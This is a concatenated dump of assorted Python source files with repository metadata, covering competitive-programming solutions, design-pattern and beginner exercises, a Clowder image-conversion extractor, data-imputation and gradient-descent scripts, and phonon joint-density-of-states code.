f845d484fcd45bd00b99b517730a82ce2ee58d0b | 0eaf0d3f0e96a839f2ef37b92d4db5eddf4b5e02 | /abc229/b.py | 5bfe4de8c5054616cf3e4adac546cb626bde495d | [] | no_license | silphire/atcoder | b7b02798a87048757745d99e8564397d1ca20169 | f214ef92f13bc5d6b290746d5a94e2faad20d8b0 | refs/heads/master | 2023-09-03T17:56:30.885166 | 2023-09-02T14:16:24 | 2023-09-02T14:16:24 | 245,110,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | a, b = input().rstrip().split()
a = list(reversed(a))
b = list(reversed(b))
for aa, bb in zip(a, b):
if int(aa) + int(bb) >= 10:
print('Hard')
exit()
print('Easy')
| [
"silphire@gmail.com"
] | silphire@gmail.com |
c1d0df4a31f85bb2d72d99fea4a7077f1ee4319e | b05fee086482565ef48785f2a9c57cfe2c169f68 | /part_one/8-abs_factory_pattern/after/factories/ford_factory.py | 1259f7dc09794969157c2515bc46ac2188cc49c1 | [] | no_license | diegogcc/py-design_patterns | 76db926878d5baf9aea1f3d2f6a09f4866c3ce1e | 2b49b981f2d3514bbd02796fe9a8ec083df6bb38 | refs/heads/master | 2023-04-01T08:28:53.211024 | 2021-04-05T11:48:19 | 2021-04-05T11:48:19 | 304,145,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | from .abs_factory import AbsFactory
from autos.ford.fiesta import FordFiesta
from autos.ford.mustang import FordMustang
from autos.ford.lincoln import LincolnMKS
class FordFactory(AbsFactory):
@staticmethod
def create_economy():
return FordFiesta()
@staticmethod
def create_sport():
return FordMustang()
@staticmethod
def create_luxury():
return LincolnMKS() | [
"diegoc906@gmail.com"
] | diegoc906@gmail.com |
e7eae1b3ccf9f4fcfc7962f970a6fb64443a01e9 | 273e10ea9b13b9cbc49f21e618d5b04da22f2465 | /bin2tif/terra_bin2tif.py | aeed1a3ef93f92ccce890a57455caf6f6a22316a | [] | no_license | solmazhajmohammadi/extractors-stereo-rgb | d08e3ba8548d466c92a324640fa4ef1107667a8d | 95bad367e725611404517a64438a10629d50e6f9 | refs/heads/master | 2021-01-21T18:59:18.122484 | 2017-05-22T20:49:33 | 2017-05-22T20:49:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,588 | py | #!/usr/bin/env python
"""
This extractor triggers when a file is added to a dataset in Clowder.
It checks for _left and _right BIN files to convert them into
JPG and TIF formats.
"""
import os
import logging
import shutil
import datetime
from pyclowder.extractors import Extractor
from pyclowder.utils import CheckMessage
import pyclowder.files
import pyclowder.datasets
import terrautils.extractors
import bin_to_geotiff as bin2tiff
class StereoBin2JpgTiff(Extractor):
def __init__(self):
Extractor.__init__(self)
influx_host = os.getenv("INFLUXDB_HOST", "terra-logging.ncsa.illinois.edu")
influx_port = os.getenv("INFLUXDB_PORT", 8086)
influx_db = os.getenv("INFLUXDB_DB", "extractor_db")
influx_user = os.getenv("INFLUXDB_USER", "terra")
influx_pass = os.getenv("INFLUXDB_PASSWORD", "")
# add any additional arguments to parser
self.parser.add_argument('--output', '-o', dest="output_dir", type=str, nargs='?',
default="/home/extractor/sites/ua-mac/Level_1/stereoTop_geotiff",
help="root directory where timestamp & output directories will be created")
self.parser.add_argument('--overwrite', dest="force_overwrite", type=bool, nargs='?', default=False,
help="whether to overwrite output file if it already exists in output directory")
self.parser.add_argument('--influxHost', dest="influx_host", type=str, nargs='?',
default="terra-logging.ncsa.illinois.edu", help="InfluxDB URL for logging")
self.parser.add_argument('--influxPort', dest="influx_port", type=int, nargs='?',
default=8086, help="InfluxDB port")
self.parser.add_argument('--influxUser', dest="influx_user", type=str, nargs='?',
default="terra", help="InfluxDB username")
self.parser.add_argument('--influxPass', dest="influx_pass", type=str, nargs='?',
default=influx_pass, help="InfluxDB password")
self.parser.add_argument('--influxDB', dest="influx_db", type=str, nargs='?',
default="extractor_db", help="InfluxDB database")
# parse command line and load default logging configuration
self.setup()
# setup logging for the exctractor
logging.getLogger('pyclowder').setLevel(logging.DEBUG)
logging.getLogger('__main__').setLevel(logging.DEBUG)
# assign other arguments
self.output_dir = self.args.output_dir
self.force_overwrite = self.args.force_overwrite
self.influx_params = {
"host": influx_host,
"port": influx_port,
"db": influx_db,
"user": influx_user,
"pass": influx_pass
}
def check_message(self, connector, host, secret_key, resource, parameters):
if not terrautils.extractors.is_latest_file(resource):
return CheckMessage.ignore
# Check for a left and right BIN file - skip if not found
found_left = False
found_right = False
for f in resource['files']:
if 'filename' in f:
if f['filename'].endswith('_left.bin'):
found_left = True
elif f['filename'].endswith('_right.bin'):
found_right = True
if not (found_left and found_right):
return CheckMessage.ignore
# Check if outputs already exist unless overwrite is forced - skip if found
out_dir = terrautils.extractors.get_output_directory(self.output_dir, resource['dataset_info']['name'])
if not self.force_overwrite:
lbase = os.path.join(out_dir, terrautils.extractors.get_output_filename(
resource['dataset_info']['name'], '', opts=['left']))
rbase = os.path.join(out_dir, terrautils.extractors.get_output_filename(
resource['dataset_info']['name'], '', opts=['right']))
if (os.path.isfile(lbase+'jpg') and os.path.isfile(rbase+'jpg') and
os.path.isfile(lbase+'tif') and os.path.isfile(rbase+'tif')):
logging.info("skipping dataset %s; outputs found in %s" % (resource['id'], out_dir))
return CheckMessage.ignore
# Check metadata to verify we have what we need
md = pyclowder.datasets.download_metadata(connector, host, secret_key, resource['id'])
found_meta = False
for m in md:
# If there is metadata from this extractor, assume it was previously processed
if not self.force_overwrite:
if 'agent' in m and 'name' in m['agent']:
if m['agent']['name'].endswith(self.extractor_info['name']):
logging.info("skipping dataset %s; metadata indicates it was already processed" % resource['id'])
return CheckMessage.ignore
if 'content' in m and 'lemnatec_measurement_metadata' in m['content']:
found_meta = True
if found_left and found_right and found_meta:
return CheckMessage.download
else:
return CheckMessage.ignore
def process_message(self, connector, host, secret_key, resource, parameters):
starttime = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
created = 0
bytes = 0
img_left = None
img_right = None
metadata = None
# Determine output location & filenames
out_dir = terrautils.extractors.get_output_directory(self.output_dir, resource['dataset_info']['name'])
logging.info("...output directory: %s" % out_dir)
if not os.path.exists(out_dir):
os.makedirs(out_dir)
lbase = os.path.join(out_dir, terrautils.extractors.get_output_filename(
resource['dataset_info']['name'], '', opts=['left']))
rbase = os.path.join(out_dir, terrautils.extractors.get_output_filename(
resource['dataset_info']['name'], '', opts=['right']))
left_jpg = lbase+'jpg'
right_jpg = rbase+'jpg'
left_tiff = lbase+'tif'
right_tiff = rbase+'tif'
# Get left/right files and metadata
for fname in resource['local_paths']:
if fname.endswith('_dataset_metadata.json'):
md = bin2tiff.load_json(fname)
for m in md:
if 'content' in m and 'lemnatec_measurement_metadata' in m['content']:
metadata = bin2tiff.lower_keys(m['content'])
break
elif fname.endswith('_left.bin'):
img_left = fname
elif fname.endswith('_right.bin'):
img_right = fname
if None in [img_left, img_right, metadata]:
raise ValueError("could not locate each of left+right+metadata in processing")
uploaded_file_ids = []
logging.info("...determining image shapes")
left_shape = bin2tiff.get_image_shape(metadata, 'left')
right_shape = bin2tiff.get_image_shape(metadata, 'right')
(left_gps_bounds, right_gps_bounds) = terrautils.extractors.calculate_gps_bounds(metadata)
out_tmp_tiff = "/home/extractor/"+resource['dataset_info']['name']+".tif"
skipped_jpg = False
if (not os.path.isfile(left_jpg)) or self.force_overwrite:
logging.info("...creating & uploading left JPG")
left_image = bin2tiff.process_image(left_shape, img_left, None)
terrautils.extractors.create_image(left_image, left_jpg)
# Only upload the newly generated file to Clowder if it isn't already in dataset
if left_jpg not in resource['local_paths']:
fileid = pyclowder.files.upload_to_dataset(connector, host, secret_key, resource['id'], left_jpg)
uploaded_file_ids.append(fileid)
created += 1
bytes += os.path.getsize(left_jpg)
else:
skipped_jpg = True
if (not os.path.isfile(left_tiff)) or self.force_overwrite:
logging.info("...creating & uploading left geoTIFF")
if skipped_jpg:
left_image = bin2tiff.process_image(left_shape, img_left, None)
# Rename output.tif after creation to avoid long path errors
terrautils.extractors.create_geotiff(left_image, left_gps_bounds, out_tmp_tiff)
shutil.move(out_tmp_tiff, left_tiff)
if left_tiff not in resource['local_paths']:
fileid = pyclowder.files.upload_to_dataset(connector, host, secret_key, resource['id'], left_tiff)
uploaded_file_ids.append(fileid)
created += 1
bytes += os.path.getsize(left_tiff)
del left_image
skipped_jpg = False
if (not os.path.isfile(right_jpg)) or self.force_overwrite:
logging.info("...creating & uploading right JPG")
right_image = bin2tiff.process_image(right_shape, img_right, None)
terrautils.extractors.create_image(right_image, right_jpg)
if right_jpg not in resource['local_paths']:
fileid = pyclowder.files.upload_to_dataset(connector, host, secret_key, resource['id'], right_jpg)
uploaded_file_ids.append(fileid)
created += 1
bytes += os.path.getsize(right_jpg)
else:
skipped_jpg = True
if (not os.path.isfile(right_tiff)) or self.force_overwrite:
logging.info("...creating & uploading right geoTIFF")
if skipped_jpg:
right_image = bin2tiff.process_image(right_shape, img_right, None)
terrautils.extractors.create_geotiff(right_image, right_gps_bounds, out_tmp_tiff)
shutil.move(out_tmp_tiff, right_tiff)
if right_tiff not in resource['local_paths']:
fileid = pyclowder.files.upload_to_dataset(connector, host, secret_key, resource['id'],right_tiff)
uploaded_file_ids.append(fileid)
created += 1
bytes += os.path.getsize(right_tiff)
del right_image
# Remove existing metadata from this extractor before rewriting
md = pyclowder.datasets.download_metadata(connector, host, secret_key, resource['id'], self.extractor_info['name'])
for m in md:
if 'agent' in m and 'name' in m['agent']:
if m['agent']['name'].endswith(self.extractor_info['name']):
if 'files_created' in m['content']:
uploaded_file_ids += m['content']['files_created']
pyclowder.datasets.remove_metadata(connector, host, secret_key, resource['id'], self.extractor_info['name'])
# Tell Clowder this is completed so subsequent file updates don't daisy-chain
metadata = terrautils.extractors.build_metadata(host, self.extractor_info['name'], resource['id'], {
"files_created": uploaded_file_ids
}, 'dataset')
pyclowder.datasets.upload_metadata(connector, host, secret_key, resource['id'], metadata)
endtime = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
terrautils.extractors.log_to_influxdb(self.extractor_info['name'], self.influx_params,
starttime, endtime, created, bytes)
if __name__ == "__main__":
extractor = StereoBin2JpgTiff()
extractor.start()
| [
"mburnet88@gmail.com"
] | mburnet88@gmail.com |
16229f8817a3670bbd21475e045b2bde33002484 | 9439162b98f039992b1aeb7120fb832bb5b70852 | /activities/5_methods.py | aa3e68114d3511c8fa0c2ddd022cd6f6efe78d62 | [] | no_license | Susaposa/Homwork_game- | 56fe70a77575197f1e3c24c7643ea1a6b48dd0f6 | 38916f626d15dfbb393ffcb5bdf603483ce64ed7 | refs/heads/master | 2021-06-13T16:03:29.095396 | 2020-04-09T17:38:52 | 2020-04-09T17:38:52 | 254,439,298 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,440 | py | # REMINDER: Only do one challenge at a time! Save and test after every one.
# Challenge 0: Remember: Do the first thing for any Python activity.
print('Challenge 1 -------------')
# Challenge 1:
# Uncomment the following code and fix the typos to practice using the list
# methods. If correct, we should see Shrek, Frozen, Titanic in that order.
my_fave_movies = []
# my_fave_movies.append(Titanic)
# my_fave_movies append("Frozen")
# my_fave_movies.append("Shrek"
# my_fave_movies.reverse
print(my_fave_movies)
print('Challenge 2 -------------')
# Challenge 2:
# 1. Uncomment the following code and fix the typos to practice using methods.
# 2. It should print out the dictionary keys, the phrase 'No manners!', the
# dictionary values, and then the word SHREK centered in the screen.
# Hint 1: Methods need a "." before them!
# Hint 2: Never should there be two values, functions, or variables separated
# only by space. There should always be some sort of operator, a dot, or
# something between them.
user_info = {
'username': 'shrek',
'location': 'swamp',
'friend': 'donkey',
}
#print(user_info keys())
#print(user_info get(manners, 'No manners!'))
#print(user_info.values[])
#print(user_info['username'] upper() center(80))
print('Challenge 3 -------------')
# Challenge 3:
# Uncomment the following code. Modify it using string methods to "sanitize"
# the input. That is to say, make it so that the user can type in weird
# spellings of yes, such as "YeS", " yes " or "YES" to cause the program
# continue.
# Hint: Look up the documentation on string methods in Python.
#answer = 'yes'
#while answer == 'yes':
# answer = input('Stay in swamp? ')
# # TODO: Sanitize 'answer' variable
#print('Leaving swamp...')
print('Challenge 4 -------------')
# Challenge 4:
# - Let's dip our toes further into Object Oriented Programming. We'll cover
# this in more detail in a couple lessons, but the following code ("class
# Ogre") is code that defines a new class aka data-type, with its own custom
# methods (methods being functions defined inside a class).
# - Below it, commented out, are attempts to call each of the three methods.
# Each is written incorrectly. Uncomment them, and fix each of their mistakes.
class Ogre:
def say_name(self):
print('My name is Shrek')
def get_friend_name(self):
return 'Donkey'
def get_enemy_name(self):
return 'Lord Farquaad'
shrek = Ogre()
# shrek.say_name
# print(shrek['get_friend_name'])
# print(shrek.get_enemy_name()
print('Challenge 5 -------------')
# Challenge 5:
# - Time to get classy! To get more early practice with class syntax, create 3
# classes: One called LordFarquaad, one called PrincessFiona, one called
# PrinceCharming.
# - You can use the Ogre class above for reference of syntax.
# - Each should have 3 methods, each method returning different values.
# --------------------- --------------------- ----------------------
# | LordFarquaad | PrincessFiona | PrinceCharming |
# --------------------- --------------------- ----------------------
# get_title | "Lord" | "Princess" | "Prince" |
# get_name | "Lord Farquaad" | "Princess Fiona" | "Prince Charming" |
# is_villain | True | False | True |
print('-------------')
# Bonus Challenge 1:
# We'll get more into the theory of OOP in a couple lessons. But until then,
# uncomment and examine the following code. See if you understand what is going
# on. See if you can refactor the 3 classes you defined in Challenge 5 to be a
# single class that takes different inputs to the `__init__` method. Once you
# have done that, see if you can create 3 instances of the class, one for each
# character that you made above.
#class Ogre:
# def __init__(self, name, location):
# self.name = name
# self.location = location
#
# def get_name(self):
# return self.name
#
# def get_location(self):
# return self.location
#
#shrek = Ogre('Shrek', 'swamp')
#print(shrek.get_name())
#print(shrek.name)
#print(shrek.get_location())
#print(shrek.location)
# Advanced Bonus Challenge:
# See if you can rewrite the bonus challenge from 2_functions.py using a class.
# Hint: Use a single class for "Location", then create many instances of that
# class for each location you can go.
| [
"susanamendoza.pd@gmail.com"
] | susanamendoza.pd@gmail.com |
d79fa7df140731982c79241a6add1e2cf01278ec | 89fa8881cd4f302d37667206e0f3ad0e00c8bfe9 | /proj1/shopping.py | a5103626328737abbced0928c96518988d0b0d7c | [] | no_license | jtsurfrat/python_mis | 09b018e1034ebe9f6e2fb7fc95746725e6226c61 | 4f1e039d53d8db6f16a1e48cbd33cb5e79d34657 | refs/heads/master | 2020-04-27T23:27:24.924319 | 2019-03-10T04:18:37 | 2019-03-10T04:18:37 | 174,776,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,924 | py | # my_list = []
# stop_shopping = False
#
# while stop_shopping == False:
# keep_shopping = bool(input("Keep shopping? "))
#
# if keep_shopping == True:
# print("You have " ,my_list)
# new_item = "{}".format(input("Please choose item"))
# print(new_item)
# else:
# print("You don't want to shop", keep_shopping)
# my_list = ["Bacon", "Cat", "Dinosaur"]
#
# for item in my_list:
# print(my_list)
# make a list hold onto our items
# shopping_list = []
# #print out intstructions on how to us app
# print("What should we pick up at the store. ")
# print("Enter 'Done' to stop adding item. ")
#
# while True:
# # ask for new items
# new_item = input("> ")
# new_item = new_item.upper()
# # be able to quit the app
# if new_item == 'DONE':
# break
# # add for new items
# shopping_list.append(new_item)
#
#
# # print out the list
# print("Here's your list: ")
#
# for item in shopping_list:
# print(item)
my_list = []
def show_help():
print("What should we pick up at the store. ")
print("""
Enter DONE to stop app
Enter 'HELP' for this help
Enter 'LIST' to see list
""")
def show_list(my_list):
for list in my_list:
print(list)
#my_list = ", ".join(my_list)
print("Your list includes {} and has {} items".format(my_list, len(my_list)))
def add_new_item(new_item):
my_list.append(new_item)
print("Added {}. List has {} items".format(new_item, len(my_list)))
print("What to pick up at the store")
show_help()
while True:
new_item = input(">")
new_item = new_item.upper()
if new_item == "DONE":
break
elif new_item == "HELP":
show_help()
continue
elif new_item == "LIST":
show_list(my_list)
continue
add_new_item(new_item)
show_list(my_list)
#
| [
"jjsurfgirl@Jennas-MacBook-Pro.local"
] | jjsurfgirl@Jennas-MacBook-Pro.local |
786550fed5bb7fed27228a771e58a1e4c2cb45dc | bd7072dabd993beb533d48fccee43f3dd81070e9 | /Credit_Card_Rating/RandomTree_fillna.py | c0642f5de8f403a1d8952e6d47ef04f3e9139c3f | [] | no_license | hurrywish/Hurrywish_Warehouse | fec12fd3afed18e3bb112ec02cf1e92882eea1f6 | b53d3b34fd25c03eec8d889c007831ba4a601ddb | refs/heads/master | 2023-01-23T19:17:15.234047 | 2020-12-05T08:00:39 | 2020-12-05T08:00:39 | 230,160,704 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,093 | py | import numpy as np
import pandas as pd
from sklearn.datasets import load_boston
from sklearn.ensemble import RandomForestRegressor
# dataset = load_boston()
# x_full = dataset.data
# y_full = dataset.target
# rows = x_full.shape[0]
# columns = x_full.shape[1]
#
# size = columns * rows
# missing_rate = 0.2
# n_missing = int(np.floor(size * missing_rate))
# rs = np.random.RandomState(1)
#
# x_processed = np.ravel(x_full)
# missing_number = rs.randint(0, size + 1, n_missing)
# x_processed[missing_number] = np.nan
# x_processed = x_processed.reshape(rows, columns)
#
# data_x = pd.DataFrame(x_processed)
def regr_fillna(data):
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestRegressor
data = pd.DataFrame(data).reset_index(drop=True).copy()
nan_values = list()
for i in data.columns:
nan_value = data[i].isnull().sum()
nan_values.append(nan_value)
nan_values = list(np.argsort(nan_values))
print(nan_values)
while nan_values:
columns_fill_value = data.columns[nan_values.pop(0)]
columns_fill_0 = [i for i in data.columns if i != columns_fill_value]
if data[columns_fill_value].isnull().sum() == 0:
print(columns_fill_value, '无空值')
else:
new_data = data.copy()
new_data[columns_fill_0] = new_data[columns_fill_0].fillna(0)
sample = new_data[columns_fill_0]
label = new_data[columns_fill_value]
y_train = label[label.notnull()]
y_test = label[label.isnull()]
x_train = sample.iloc[y_train.index]
x_test = sample.iloc[y_test.index]
regr = RandomForestRegressor(n_estimators=100,n_jobs=-1)
regr.fit(x_train, y_train)
y_pred = regr.predict(x_test)
data.loc[y_test.index,[columns_fill_value]] = y_pred
train_score = regr.score(x_train, y_train)
print('%s列,得分:%0.2f' % (columns_fill_value, train_score))
return data
# data1 = regr_fillna(x_processed)
# print(data1)
| [
"hurrywish@MacbookPro2019.lan"
] | hurrywish@MacbookPro2019.lan |
f2eb9fb4d19424e0c0a0c5da2b96f55c214162b6 | a4cee21ba028e8d9a0d0e8ae33dcb84d20bf894f | /machinLearn/test.py | 5ca6bf16c8bae0acd5c8c6f69026157c75a1b4ea | [] | no_license | Aeee90/python | f8ac109adfaa06defb98b162bb4369bcded00458 | f91f3331b74c788604fda900ef43b5a7858a5809 | refs/heads/master | 2020-04-14T07:30:35.482549 | 2019-01-01T05:10:23 | 2019-01-01T05:10:23 | 163,714,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,576 | py | import numpy as np
import matplotlib.pyplot as plt
dataSet2 = ([1,1],[2,2],[3,3],[4,4],[5,5],[6,6],[7,7],[8,8],[9,9],[10,10],[11,11],[12,12],[13,13],[14,14],[15,15],[16,16],[17,17],[18,18],[19,19],[20,20])
dataSet3 = ([1,3],[2,5],[3,7],[4,9],[5,11],[6,13],[7,15],[8,17],[9,19],[10,21],[11,23],[12,25],[13,27],[14,29],[15,31],[16,33],[17,35],[18,37],[19,39],[20,41])
lr = 0.01
M = len(dataSet3)
print("데이터크기 M = {}".format(M))
print("learning rate Alpha = {}".format(lr))
#DataSet을 그래프의 각 x,y로 표시해주기 위해서 1차 배열로 바꾸어준다.
x = []
y = []
for row in dataSet3:
x.append(row[0])
y.append(row[1])
class heightAndWeight:
def showDataSet(self, theta0, theta1):
plt.plot(x, y, 'rs')
plt.xlabel('X')
plt.ylabel('Y')
x2 = np.arange(1, M)
y2 = theta0 + theta1*x2
plt.plot(x2, y2)
plt.show()
def costFunction(self, theta0, theta1):
#theta0 , theta1 = np.arange(-1, 1, 0.1), np.arange(-1, 1, 0.1)
#데이타 셋에 대한 세타0, 세타1에 대한 소비함수를 그려보자
costSum = [];
for j in np.arange(0, M):
sum = 0
for i in np.arange(0,M):
sum += (theta0[j] + 4/9*x[i] - y[i]) **2
costSum.append(sum/(2*M))
plt.plot(theta0, costSum, 'rs')
plt.xlabel("theta")
plt.ylabel("Cost Function")
plt.show()
def gradient_descent(self, theta0 =3, theta1 =4, count=100):
#초기 theta값을 인자로 설정
thetaX0, thetaX1 = [], []
for j in np.arange(0,count):
#기울기
grad0 , grad1 = 0, 0
ySum = 0
xSum = 0
for i in np.arange(0,M):
grad0 += theta0 + theta1*x[i] - y[i]
grad1 += (theta0 + theta1*x[i] - y[i])*x[i]
grad0 = lr*grad0/M
grad1 = lr*grad1/M
theta0 = theta0 - grad0
thetaX0.append(theta0)
theta1 = theta1 - grad1
thetaX1.append(theta1)
print("{}번째 : theta0 = {}, theta1 = {}".format(j, theta0, theta1))
#self.costFunction(thetaX0, thetaX1)
return [theta0, theta1, thetaX0, thetaX1]
test = heightAndWeight()
#test.showDataSet()
#test.costFunction(np.arange(-9, -8, 0.05), np.arange(-1, 1, 0.1))
test.showDataSet(1,1)
testTheta = test.gradient_descent(1,1, 100)
test.showDataSet(testTheta[0], testTheta[1])
| [
"iseoyeon@iseoyeon-ui-MacBookPro.local"
] | iseoyeon@iseoyeon-ui-MacBookPro.local |
4c7568977c523b38f203600aec9c4befcad3cb63 | 910a4c0d08dd01bba099dc9167054000ba3d3cc5 | /anharmonic/phonon3/joint_dos.py | 068cbab4417aae0e449cc6c2624dcfa424f12fe8 | [] | no_license | supersonic594/phonopy | 6b8be78c53e1a820397b659844a6357a86b50bc5 | 619c2bae99f6844eb0b33ea90fca246897844869 | refs/heads/master | 2021-01-20T07:54:22.308293 | 2015-11-01T03:44:25 | 2015-11-01T03:44:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,812 | py | import sys
import numpy as np
from phonopy.structure.symmetry import Symmetry
from phonopy.units import VaspToTHz
from anharmonic.phonon3.triplets import (get_triplets_at_q,
get_nosym_triplets_at_q,
get_tetrahedra_vertices,
get_triplets_integration_weights,
occupation)
from anharmonic.phonon3.interaction import set_phonon_c
from anharmonic.phonon3.imag_self_energy import get_frequency_points
from phonopy.harmonic.dynamical_matrix import get_dynamical_matrix
from phonopy.structure.tetrahedron_method import TetrahedronMethod
class JointDos:
def __init__(self,
mesh,
primitive,
supercell,
fc2,
nac_params=None,
nac_q_direction=None,
sigma=None,
cutoff_frequency=None,
frequency_step=None,
num_frequency_points=None,
temperatures=None,
frequency_factor_to_THz=VaspToTHz,
frequency_scale_factor=1.0,
is_nosym=False,
symprec=1e-5,
filename=None,
log_level=False,
lapack_zheev_uplo='L'):
self._grid_point = None
self._mesh = np.array(mesh, dtype='intc')
self._primitive = primitive
self._supercell = supercell
self._fc2 = fc2
self._nac_params = nac_params
self._nac_q_direction = None
self.set_nac_q_direction(nac_q_direction)
self._sigma = None
self.set_sigma(sigma)
if cutoff_frequency is None:
self._cutoff_frequency = 0
else:
self._cutoff_frequency = cutoff_frequency
self._frequency_step = frequency_step
self._num_frequency_points = num_frequency_points
self._temperatures = temperatures
self._frequency_factor_to_THz = frequency_factor_to_THz
self._frequency_scale_factor = frequency_scale_factor
self._is_nosym = is_nosym
self._symprec = symprec
self._filename = filename
self._log_level = log_level
self._lapack_zheev_uplo = lapack_zheev_uplo
self._num_band = self._primitive.get_number_of_atoms() * 3
self._reciprocal_lattice = np.linalg.inv(self._primitive.get_cell())
self._set_dynamical_matrix()
self._symmetry = Symmetry(primitive, symprec)
self._tetrahedron_method = None
self._phonon_done = None
self._frequencies = None
self._eigenvectors = None
self._joint_dos = None
self._frequency_points = None
def run(self):
try:
import anharmonic._phono3py as phono3c
self._run_c()
except ImportError:
print "Joint density of states in python is not implemented."
return None, None
def get_joint_dos(self):
return self._joint_dos
def get_frequency_points(self):
return self._frequency_points
def get_phonons(self):
return self._frequencies, self._eigenvectors, self._phonon_done
def get_primitive(self):
return self._primitive
def get_mesh_numbers(self):
return self._mesh
def set_nac_q_direction(self, nac_q_direction=None):
if nac_q_direction is not None:
self._nac_q_direction = np.array(nac_q_direction, dtype='double')
def set_sigma(self, sigma):
if sigma is None:
self._sigma = None
else:
self._sigma = float(sigma)
def set_grid_point(self, grid_point):
self._grid_point = grid_point
self._set_triplets()
num_grid = np.prod(len(self._grid_address))
num_band = self._num_band
if self._phonon_done is None:
self._phonon_done = np.zeros(num_grid, dtype='byte')
self._frequencies = np.zeros((num_grid, num_band), dtype='double')
self._eigenvectors = np.zeros((num_grid, num_band, num_band),
dtype='complex128')
self._joint_dos = None
self._frequency_points = None
self.set_phonon(np.array([grid_point], dtype='intc'))
def get_triplets_at_q(self):
return self._triplets_at_q, self._weights_at_q
def get_grid_address(self):
return self._grid_address
def get_bz_map(self):
return self._bz_map
def _run_c(self, lang='C'):
if self._sigma is None:
if lang == 'C':
self._run_c_with_g()
else:
if self._temperatures is not None:
print "JDOS with phonon occupation numbers doesn't work",
print "in this option."
self._run_py_tetrahedron_method()
else:
self._run_c_with_g()
def _run_c_with_g(self):
self.set_phonon(self._triplets_at_q.ravel())
if self._sigma is None:
f_max = np.max(self._frequencies) * 2
else:
f_max = np.max(self._frequencies) * 2 + self._sigma * 4
f_max *= 1.005
f_min = 0
self._set_uniform_frequency_points(f_min, f_max)
num_freq_points = len(self._frequency_points)
num_mesh = np.prod(self._mesh)
if self._temperatures is None:
jdos = np.zeros((num_freq_points, 2), dtype='double')
else:
num_temps = len(self._temperatures)
jdos = np.zeros((num_temps, num_freq_points, 2), dtype='double')
occ_phonons = []
for t in self._temperatures:
freqs = self._frequencies[self._triplets_at_q[:, 1:]]
occ_phonons.append(np.where(freqs > self._cutoff_frequency,
occupation(freqs, t), 0))
for i, freq_point in enumerate(self._frequency_points):
g = get_triplets_integration_weights(
self,
np.array([freq_point], dtype='double'),
self._sigma,
is_collision_matrix=True,
neighboring_phonons=(i == 0))
if self._temperatures is None:
jdos[i, 1] = np.sum(
np.tensordot(g[0, :, 0], self._weights_at_q, axes=(0, 0)))
gx = g[2] - g[0]
jdos[i, 0] = np.sum(
np.tensordot(gx[:, 0], self._weights_at_q, axes=(0, 0)))
else:
for j, n in enumerate(occ_phonons):
for k, l in list(np.ndindex(g.shape[3:])):
jdos[j, i, 1] += np.dot(
(n[:, 0, k] + n[:, 1, l] + 1) *
g[0, :, 0, k, l], self._weights_at_q)
jdos[j, i, 0] += np.dot((n[:, 0, k] - n[:, 1, l]) *
g[1, :, 0, k, l],
self._weights_at_q)
self._joint_dos = jdos / num_mesh
def _run_py_tetrahedron_method(self):
thm = TetrahedronMethod(self._reciprocal_lattice, mesh=self._mesh)
self._vertices = get_tetrahedra_vertices(
thm.get_tetrahedra(),
self._mesh,
self._triplets_at_q,
self._grid_address,
self._bz_map)
self.set_phonon(self._vertices.ravel())
f_max = np.max(self._frequencies) * 2
f_max *= 1.005
f_min = 0
self._set_uniform_frequency_points(f_min, f_max)
num_freq_points = len(self._frequency_points)
jdos = np.zeros((num_freq_points, 2), dtype='double')
for vertices, w in zip(self._vertices, self._weights_at_q):
for i, j in list(np.ndindex(self._num_band, self._num_band)):
f1 = self._frequencies[vertices[0], i]
f2 = self._frequencies[vertices[1], j]
thm.set_tetrahedra_omegas(f1 + f2)
thm.run(self._frequency_points)
iw = thm.get_integration_weight()
jdos[:, 1] += iw * w
thm.set_tetrahedra_omegas(f1 - f2)
thm.run(self._frequency_points)
iw = thm.get_integration_weight()
jdos[:, 0] += iw * w
thm.set_tetrahedra_omegas(-f1 + f2)
thm.run(self._frequency_points)
iw = thm.get_integration_weight()
jdos[:, 0] += iw * w
self._joint_dos = jdos / np.prod(self._mesh)
def _set_dynamical_matrix(self):
self._dm = get_dynamical_matrix(
self._fc2,
self._supercell,
self._primitive,
nac_params=self._nac_params,
frequency_scale_factor=self._frequency_scale_factor,
symprec=self._symprec)
def _set_triplets(self):
if self._is_nosym:
if self._log_level:
print "Triplets at q without considering symmetry"
sys.stdout.flush()
(self._triplets_at_q,
self._weights_at_q,
self._grid_address,
self._bz_map,
map_triplets,
map_q) = get_nosym_triplets_at_q(
self._grid_point,
self._mesh,
self._reciprocal_lattice,
with_bz_map=True)
else:
(self._triplets_at_q,
self._weights_at_q,
self._grid_address,
self._bz_map,
map_triplets,
map_q) = get_triplets_at_q(
self._grid_point,
self._mesh,
self._symmetry.get_pointgroup_operations(),
self._reciprocal_lattice)
def set_phonon(self, grid_points):
set_phonon_c(self._dm,
self._frequencies,
self._eigenvectors,
self._phonon_done,
grid_points,
self._grid_address,
self._mesh,
self._frequency_factor_to_THz,
self._nac_q_direction,
self._lapack_zheev_uplo)
def set_frequency_points(self, frequency_points):
self._frequency_points = np.array(frequency_points, dtype='double')
def _set_uniform_frequency_points(self, f_min, f_max):
if self._frequency_points is None:
self._frequency_points = get_frequency_points(
f_min,
f_max,
frequency_step=self._frequency_step,
num_frequency_points=self._num_frequency_points)
| [
"atz.togo@gmail.com"
] | atz.togo@gmail.com |
